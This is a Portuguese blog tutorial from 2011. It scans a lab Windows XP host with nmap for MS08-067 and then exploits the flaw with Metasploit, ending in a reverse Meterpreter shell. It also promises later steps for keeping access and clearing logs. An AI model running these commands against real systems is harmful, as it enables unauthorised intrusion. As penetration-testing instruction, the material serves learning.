Ataques ao Windows (Parte 2)

Posted by Miguel Lopes on Fri, Mar 25, 2011
In Segurança,

No post anterior mostrei um pouco sobre as funcionalidades do nmap, hoje pretendo mostrar mais uma função do nmap e dar uma pequena demonstração da utilização do metasploit.

O nmap possui desde o inicio da versão 5 um motor de scripts, isto permite automatizar certas tarefas e/ou proceder com o aumento de funcionalidades desta potente aplicação. Uma das funcionalidades adicionada ao nmap pelo motor de scripts (NSE - Nmap Script Engine) permite identificar maquinas infectadas com Conficker ( um worm recente que explora a vulnerabilidade_ MS08-067 _) bem como maquinas vulneráveis.

Como constatamos no passo anterior temos um windows XP SP2/SP3, que com a porta 445 aberta que quer dizer que provavelmente podemos abusar da vuln MS08-067 e ganhar acesso ao sistema. No entanto antes de lançar qualquer exploit vamos verificar se realmente está vulnerável esta maquina.

# nmap --script=smb-check-vulns 192.168.0.7

Starting Nmap 5.21 ( http://nmap.org ) at 2011-03-24 14:15 WET
NSE: Script Scanning completed.
Nmap scan report for 192.168.0.7
Host is up (0.0093s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2869/tcp open  unknown
MAC Address: 08:00:27:CB:09:65 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|_  SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)

Nmap done: 1 IP address (1 host up) scanned in 0.85 seconds

Aqui podemos constatar que a maquina está vulnerável e que parece não estar infectada com o conficker. Agora que encontramos este acesso basta conseguir explorar-lo. Para isso abrimos o metasploit

# ./msfconsole 

#    # ###### #####   ##    ####  #####  #       ####  # #####
##  ## #        #    #  #  #      #    # #      #    # #   #
# ## # #####    #   #    #  ####  #    # #      #    # #   #
#    # #        #   ######      # #####  #      #    # #   #
#    # #        #   #    # #    # #      #      #    # #   #
#    # ######   #   #    #  ####  #      ######  ####  #   #

       =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 668 exploits - 345 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12121 updated today (2011.03.25)

msf >

… definir o ip do alvo e o payload juntamente com o ip da maquina que está atacar e seleccionar o exploit e finalmente lançar o ataque!

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > set PAYLOAD windows/metsvc_reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.6
LHOST => 192.168.0.6 msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.0.3:4444
[*] Automatically detecting the target... 
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Portuguese 
[*] Selected Target: Windows XP SP3 Portuguese (NX) 
[*] Attempting to trigger the vulnerability... 
[*] Sending stage (749056 bytes) to 192.168.0.7 
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1460) at 2011-03-24 14:42:15 +0000  meterpreter >

E pronto consegui-mos acesso á maquina. No proximo post irei demostrar o que fazer depois de ter acesso a uma maquina remota, como manter o acesso e limpar os registos.



comments powered by Disqus